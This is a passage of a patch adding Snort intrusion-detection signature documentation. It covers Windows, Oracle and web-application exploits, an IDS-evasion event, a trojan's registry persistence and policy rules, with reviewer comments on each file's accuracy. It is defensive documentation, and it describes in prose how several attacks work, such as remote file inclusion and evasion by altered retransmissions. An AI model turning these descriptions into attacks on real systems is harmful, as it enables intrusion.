+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
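Review bot: Apart from the Sid line, 2933.txt is word-for-word identical to 2930.txt later in this patch, so an analyst reading either file cannot tell what distinguishes the two rules (which packet pattern, port or transport each one matches). Detailed Information should state what this particular rule looks for; without that, the shared text will also drift as the two copies are maintained separately. Minor: "Execution of arbitrary code with system level privileges" in Impact needs a period, and "Apply the appropriate vendor supplied patches" in Corrective Action should name the bulletin that is only given under Additional References (MS04-031).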
--- /dev/null
+++ b/doc/signatures/2930.txt
@@ -0,0 +1,68 @@
+Rule:
+
+--
+Sid:
+2930
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft Network Dynamic Data Exchange (NetDDE)
+services.
+
+--
+Impact:
+Serious. Execution of arbitrary code with system level privileges
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft NetDDE that may allow an attacker to
+run code of their choosing with system level privileges. A programming
+error in the handling of network messages may give an attacker the
+opportunity to overflow a fixed length buffer by using a specially
+crafted NetDDE message.
+
+This service is not started by default on Microsoft Windows systems, but
+this issue can also be exploited locally in an attempt to escalate
+privileges after a successful attack from an alternate vector.
+
+--
+Affected Systems:
+	Microsoft Windows NT, 2000, 2003, XP, 98 and ME systems.
+
+--
+Attack Scenarios:
+An attacker needs to craft a special NetDDE message in order to overflow
+the affected buffer.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Disable the NetDDE service.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Microsoft Security Bulletin MS04-031:
+http://www.microsoft.com/technet/security/bulletin/ms04-031.mspx
+
+--
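Review bot: This file duplicates 2933.txt earlier in this patch verbatim except for the Sid. If SIDs 2930 and 2933 detect the same NetDDE overflow (MS04-031) through different patterns, the one sentence naming the difference belongs in the Detailed Information of each file; if they are genuinely one rule documented twice, ship one file rather than two copies that will diverge under maintenance. The same small fixes apply here: a period after "system level privileges" in Impact, and the bulletin number alongside "Apply the appropriate vendor supplied patches" in Corrective Action.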
--- /dev/null
+++ b/doc/signatures/1499.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1499
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
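Review bot: The Summary and Detailed Information describe "a web server or a web application" in general and never name the script, URI or request pattern that SID 1499 matches, so the document gives an analyst nothing to triage the alert against; Affected Systems ("All systems using a web server") has the same problem. Ease of Attack asserts "Exploits exist" and False Positives "None known" for a rule whose target is never identified, which cannot be checked by the reader. Please replace the boilerplate paragraphs with what the rule looks for and which application that pattern belongs to. Minor: "attackers choosing" in Impact needs an apostrophe ("attacker's").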
--- /dev/null
+++ b/doc/signatures/1796.txt
@@ -0,0 +1,64 @@
+Rule:  
+--
+Sid:
+
+1796
+
+--
+Summary:
+This rule indicates that a webpage was visited the included the content "virgin".
+
+--
+Impact:
+Someone could be violating your company's policy regarding the browsing of inappropriate content.
+
+--
+Detailed Information:
+
+This rule looks for a response from a webserver containing "virgin".
+
+--
+Affected Systems:
+
+All
+
+--
+Attack Scenarios:
+
+Not an attack.  
+
+--
+Ease of Attack:
+
+N/A.
+
+--
+False Positives:
+
+This could have been caused by a pop-up window or spam with an embedded link to a pornographic website.  This could also be caused by somebody visiting the snort rule descriptions on the snort website, or a site about olive oil. etc.etc.
+
+--
+False Negatives:
+
+None known.
+--
+Corrective Action:
+
+Dependent on your company's policies.   
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Steven Alexander<alexander.s@mccd.edu>
+-- 
+Additional References:
+
+
+
+
+
+
+
+--
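Review bot: The Summary reads "a webpage was visited the included the content "virgin""; it should be "that included the content". Additional References is a run of seven empty lines before the closing "--"; trim it to one blank line like the other files. Substantively, Detailed Information says the rule matches any server response containing the string "virgin" and the False Positives section already concedes that unrelated pages (the example given is a site about olive oil) will trigger it, so the Summary and Impact should state that this is a content-policy rule with a high false-positive rate and not an attack signature, which is what "Not an attack." under Attack Scenarios already implies.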
--- /dev/null
+++ b/doc/signatures/100000453.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+100000453
+--
+Summary:
+This event is generated when an attempt is made to exploit a cross site 
+scripting vulnerability in the "KAPhotoservice" application running on a 
+webserver.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to exploit a cross site 
+scripting vulnerability via the "apage" parameter in the "edtalbum.asp" script 
+used by the "KAPhotoservice" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to retrieve sensitive data, execute system binaries 
+or malicious code of the attackers choosing.
+
+--
+Affected Systems:
+All systems running CGI applications using KAPhotoservice
+--
+Attack Scenarios:
+An attacker can supply a malicious link designed to steal information from a 
+user clicking on that link.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+The Cross Site Scripting (XSS) FAQ
+http://www.cgisecurity.com/articles/xss-faq.shtml
+
+--
+
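Review bot: The Impact section ("system integrity compromise", "unauthorized administrative access to the server", "execution of arbitrary code") is the generic server-side boilerplate and does not describe cross-site scripting: script injected through the "apage" parameter of edtalbum.asp runs in a victim's browser in the context of the site, so the realistic impact is theft of the user's session or credentials and phishing, which is exactly what Attack Scenarios says ("a malicious link designed to steal information from a user clicking on that link"). The second Detailed Information paragraph ("retrieve sensitive data, execute system binaries") has the same problem and should be dropped. Corrective Action could add the application-level fix for XSS: the value of "apage" must be encoded for the HTML context before it is reflected into the response.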
--- /dev/null
+++ b/doc/signatures/111-3.txt
@@ -0,0 +1,62 @@
+Rule: 
+
+--
+Sid: 
+111-3
+
+-- 
+Summary: 
+This event is generated when the pre-processor stream4
+detects network traffic that may constitute an attack.
+
+-- 
+Impact: 
+Unknown. This may be an IDS evasion attempt.
+
+--
+Detailed Information:
+The pre-processor stream4 has detected a TCP session that contains
+a retransmission of data that has not already been acknowleged. This
+may be an attempt to evade any monitoring IDS.
+
+--
+Affected Systems:
+	All systems
+
+--
+Attack Scenarios: 
+An attacker could supply two packets containing different data, one with
+a malicious payload destined for a vulnerable host and the other with a
+benign payload meant for the IDS. The second packet may disguise itself
+in the session as retransmitted data.
+
+-- 
+Ease of Attack: 
+Simple. Tools such as fragroute contain this functionality.
+
+-- 
+
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+-- 
+
+Corrective Action:
+Check the target host for signs of compromise.
+
+Ensure the system is up to date with any appropriate vendor supplied patches.
+
+--
+Contributors:
+Martin Roesch <roesch@sourcefire.com>
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
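Review bot: Detailed Information says stream4 detected "a retransmission of data that has not already been acknowleged". Retransmitting unacknowledged data is what every TCP sender does after a retransmission timeout, so as written the sentence describes normal traffic rather than an evasion; the actual concern is the one given in Attack Scenarios, a segment presented as a retransmission whose payload differs from the segment already seen, so that the IDS and the end host reassemble different streams. Reword Detailed Information to match Attack Scenarios and fix "acknowleged" to "acknowledged". "None Known" under False Positives is also optimistic for a preprocessor event of this kind: lossy or asymmetrically routed paths produce legitimate overlapping retransmissions, and that caveat belongs here so operators do not treat every event as an fragroute-style evasion.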
--- /dev/null
+++ b/doc/signatures/1970.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+1970
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow in the Remote Data Services (RDS) component of Microsoft Data Access Components (MDAC).  
+
+--
+Impact:
+Remote Access.  If the exploit is successful, an attacker can gain remote access to the host.
+
+--
+Detailed Information:
+MDAC is a set of components that facilitates database access on Windows platforms.  The RDS component provides remote access to a database through Internet Information Services (IIS).  A vulnerability exists because of incorrect string handling with the RDS interface allowing an attacker to send a malformed HTTP request that overruns onto the heap.  This may allow execution of arbitrary code on the system. 
+
+--
+Affected Systems:
+Windows hosts running MDAC 2.1, 2.5, 2.6
+
+--
+Attack Scenarios:
+An attacker can send a malformed HTTP request that is improperly validated by RDS, subsequently causing a buffer overflow.
+
+--
+Ease of Attack:
+Difficult.  According to the Microsoft bulletin, a heap is more difficult to exploit than a stack overflow.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply security hotfix for Q329414.
+
+
+--
+Contributors:
+Original rule written by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2002-1142
+
+Foundstone
+http://www.foundstone.com/knowledge/randd-advisories-display.html?id=337
+
+Microsoft
+http://support.microsoft.com/default.aspx?scid=kb;en-us;Q329414
+
+--
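Review bot: Ease of Attack rates this "Difficult" solely because "a heap is more difficult to exploit than a stack overflow"; that is a statement about the vulnerability class, not about this RDS bug, and the rating should rest on whether working exploit code is in circulation, which none of the sections addresses. Corrective Action names only the hotfix KB number (Q329414); cite the accompanying Microsoft Security Bulletin as well, as 2933.txt does for MS04-031, since that is what patch-management tooling keys on. Minor: the CVE link still uses the candidate form CAN-2002-1142, and "Remote Access." in Impact should be a full sentence.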
--- /dev/null
+++ b/doc/signatures/100000774.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000774
+--
+Summary:
+This event is generated when an attempt is made to exploit an SQL injection vulnerability in the "Blog CMS" application running on a webserver. Access to the file "index.php" with SQL commands being passed as the "category" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to inject SQL code from a remote machine via the "category" parameter in the "index.php" script used by the "Blog CMS" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to compromise the database backend for the application, the attacker may also be able to execute system binaries or malicious code of their choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Blog CMS
+--
+Attack Scenarios:
+An attacker can inject SQL commands to the backend database for an application if user input is not correctly sanitized or checked before passing that input to the database.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+SQL Injection Attack and Defense
+http://www.securitydocs.com/library/3587
+
+--
+
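Review bot: The third paragraph of Detailed Information ("an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host") is the generic authentication-bypass boilerplate and does not describe SQL injection through the "category" parameter of index.php; it contradicts the otherwise accurate Attack Scenarios paragraph and should be removed. Corrective Action says only to patch, while Attack Scenarios already names the root cause ("user input is not correctly sanitized or checked before passing that input to the database"); add the corresponding fix, validating the parameter and passing it to the database as a bound parameter rather than by string concatenation. Typos: "ona" for "on a", "attackers" for "attacker's", and "an exploitation attempt has been attempted" is redundant.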
--- /dev/null
+++ b/doc/signatures/100000373.txt
@@ -0,0 +1,58 @@
+
+
+Rule:
+
+--
+Sid:
+100000373
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "phpNuke" application running on a webserver. Access to the file "admin_user_ban.php" using a remote file being passed as the "phpbb_root_path" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpbb_root_path" parameter in the "admin_user_ban.php" script used by the "phpNuke" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using phpNuke
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
+
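Review bot: Attack Scenarios describes an attacker who can "access an authentication mechanism and supply his/her own credentials", which has nothing to do with the remote file include through the "phpbb_root_path" parameter that the Summary and Detailed Information describe; the scenario for an RFI is that the attacker hosts a PHP file and passes its URL in the parameter so that the server includes and executes it. The third Detailed Information paragraph about validating client credentials is the same misplaced boilerplate and should go. The parameter name phpbb_root_path and the script admin_user_ban.php are phpBB names, so the document should say whether the affected component is phpNuke itself or its bundled phpBB-based Forums module, since that determines which update fixes it. Corrective Action could also mention the PHP-level mitigation of disabling remote URL file inclusion (allow_url_fopen) on the affected host. Typos: "ona" for "on a", "attackers choosing" for "attacker's choosing".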
--- /dev/null
+++ b/doc/signatures/1985.txt
@@ -0,0 +1,93 @@
+Rule:
+
+--
+Sid:
+1985
+
+--
+Summary:
+Doly is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data and control of the targeted machine leading to a compromise of all resources the machine is connected to. This Trojan also has the ability to delete data, steal passwords and disable the machine. Later versions are capable of launching DDoS attacks.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
+	Windows ME
+	Windows NT
+	Windows 2000
+	Windows XP
+
+No other systems are affected. This is a windows exceutable that makes changes to the system registry, Win.ini and System.ini. When first executed the Trojan replicates itself and in most cases, gives the copy a random name. This Trojan may use the file extensions ".exe" or ".dll".
+
+The Trojan changes system startup files and registry settings to add the Doly sever to programs normally started on boot.
+
+	SID	Message
+	---	-------
+	119	Doly 2.0 access (outgoing TCP connection)
+	1985	Doly 1.5 server response (outgoing TCP connection)
+
+--
+Attack Scenarios:
+This Trojan may be delivered to the target in a number of ways. This event is indicative of an existing infection being activated. Initial compromise can be in the form of a Win32 installation program that may use the extension ".jpg" or ".bmp" when delivered via e-mail for example.
+
+--
+Ease of Attack:
+This is Trojan activity, the target machine may already be compromised. Updated virus definition files are essential in detecting this Trojan.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+
+This is a particularly difficult Trojan to remove and should only be attempted by an experienced Windows Administrator.
+
+Edit the system registry to remove the extra keys or restore a previously known good copy of the registry.
+
+Affected registry keys are:
+
+	HKEY_CLASSES_ROOT\exefile\shell\open\command
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\Run
+	HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Current Version\RunServices
+	HKEY_LOCAL_MACHINE\Hardware\Data
+	HKEY_LOCAL_MACHINE\Hardware\Enum
+	HKEY_LOCAL_MACHINE\Software\Microsoft\DirectXMedia
+
+Registry keys added are:
+
+	HKEY_CLASSES_ROOT\.dl
+
+Removal of the replicant is also required, look for files ending in ".exe" or ".dll" in the <drive>:\Windows\ or <drive>:\Windows\System\ folders that use alphanumeric file names. The name of the replicant may be in one of the registry keys above.
+
+A machine reboot is required to clear the existing process from running in memory.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Whitehats arachNIDS
+http://www.whitehats.com/info/IDS312
+
+Hackfix
+http://www.hackfix.org/miscfix/doly.shtml
+
+Dark-e Trojan Archive
+http://www.dark-e.com/archive/trojans/doly/index.html
+
+--
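Review bot: The registry paths in Corrective Action are wrong as written: the Windows keys are HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run and HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices, with no space in "CurrentVersion", so an administrator following the text literally will not find them. "HKEY_CLASSES_ROOT\.dl" also looks truncated and should be checked against the source the list was taken from. The Summary ("Doly is a Trojan Horse.") should describe the event itself: the SID table in Detailed Information says SID 1985 fires on a Doly 1.5 server response on an outgoing TCP connection, and that sentence belongs in the Summary. The file also lacks the "Affected Systems:" header the other files use, even though it carries the operating-system list under Detailed Information. Typos: "exceutable" for "executable", "sever" for "server".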
--- /dev/null
+++ b/doc/signatures/100000470.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000470
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Foing" application running on a webserver. Access 
+to the file "manage_songs.php" using a remote file being passed as the 
+"foing_root_path" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "foing_root_path" parameter in the "manage_songs.php" 
+script used by the "Foing" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Foing
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
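Review bot: The Attack Scenarios paragraph is about supplying credentials to "an authentication mechanism" and does not describe a remote file include through the "foing_root_path" parameter of manage_songs.php; the third Detailed Information paragraph ("validating the credentials of a client host") is the same misplaced boilerplate. Both should be replaced by a description of the actual attack: a URL pointing at attacker-hosted PHP is passed in the parameter and executed by the including server. Corrective Action should then also cover the PHP-level mitigation of not allowing include() to fetch remote URLs. Typos: "ona" for "on a", "attackers choosing" for "attacker's choosing", and "an exploitation attempt has been attempted" is redundant.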
--- /dev/null
+++ b/doc/signatures/2876.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+2876
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database server.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code and Denial of Service.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to exploit a known
+vulnerability in an Oracle database implementation. Multiple buffer
+overflow conditions are present in numerous packages and procedures.
+
+Exploitation of these vulnerable procedures may allow an attacker to
+execute code of their choosing as the user running the database. In the
+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure alter_priority_varchar2
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
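Review bot: Detailed Information has a line break between the procedure name and the sentence's full stop ("alter_priority_varchar2" on one line, ". This procedure is included in" on the next), which reads as a formatting accident; join the lines. Affected Systems says "Oracle Oracle9i" (doubled word). 2634.txt, which documents another overflow in a built-in Oracle package, states under Attack Scenarios that the attacker must first log on to the database with a valid username and password; the same prerequisite applies to calling a procedure in sys.dbms_repcat_conf and should be stated here, because "Ease of Attack: Simple." without it overstates the exposure. Additional References is empty for a vendor-patched issue; cite the Oracle alert that Corrective Action's "appropriate vendor supplied patch" refers to.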
--- /dev/null
+++ b/doc/signatures/2634.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+2634
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "rectifier_diff.differences" and "rectifier_diff.rectify"
+procedures are used to find and resolve inconsistencies between
+two replicated sites. These procedures contain a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the "sname1" variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
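Review bot: Attack Scenarios refers to "the "sname1" variable" without ever introducing it; Detailed Information should say that sname1 is a parameter of the rectifier_diff.differences and rectifier_diff.rectify procedures, otherwise the reader cannot connect the two sections. The sentence "If you are running Oracle on a Windows server, make sure that the variable $ORACLE_PORTS is set to a value of "any"" is Snort configuration advice and explains nothing about the vulnerability; if it stays, it should say why (on Windows the Oracle listener redirects clients to dynamically assigned ports, so rules bound to the listener port alone miss the traffic) and sit apart from the vulnerability description. Typo in Summary: "a Oracle database" should be "an Oracle database".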
--- /dev/null
+++ b/doc/signatures/3113.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3113
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
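Review bot: Affected Systems lists "Microsoft Windows Server 2000"; the product is Windows 2000 Server (the "Windows Server" naming begins with 2003). Detailed Information's "The unchecked buffer exists when processing the length of messages sent to the logging service" is muddled: it is the message length that is not checked, and the fixed buffer is overrun as a result; reword along the lines of "the service does not check the length of an incoming message before copying it into a fixed-size buffer". Additional References is empty, whereas the other Microsoft entries in this patch (2933.txt, 2930.txt) cite the security bulletin; add the bulletin that covers the License Logging Service fix so Corrective Action's "appropriate vendor supplied patches" is actionable.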
--- /dev/null
+++ b/doc/signatures/540.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid: 540
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+MSN Protocol
+http://www.hypothetic.org/docs/msn/
+Devarticles
+http://www.devarticles.com/index2.php?option=content&task=view&id=225&pop=1&hide_ads=1&page=1
+MSN Messenger Protocol
+http://www.venkydude.com/articles/msn.htm
+
+--
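Review bot: The Summary ("activity relating to network chat clients") is too general to act on: all three Additional References describe the MSN Messenger protocol, so the Summary and Detailed Information should say that the rule matches MSN Messenger traffic and what it keys on. The file has no "Affected Systems:" section, and puts the SID on the same line as its heading ("Sid: 540") where every other file puts it on the next line. Typo in Impact: "unkown". Contributors gives Brian Caswell's address as brian.caswell@sourcefire.com while the other files use bmc@sourcefire.com; pick one.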
--- /dev/null
+++ b/doc/signatures/873.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+873
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
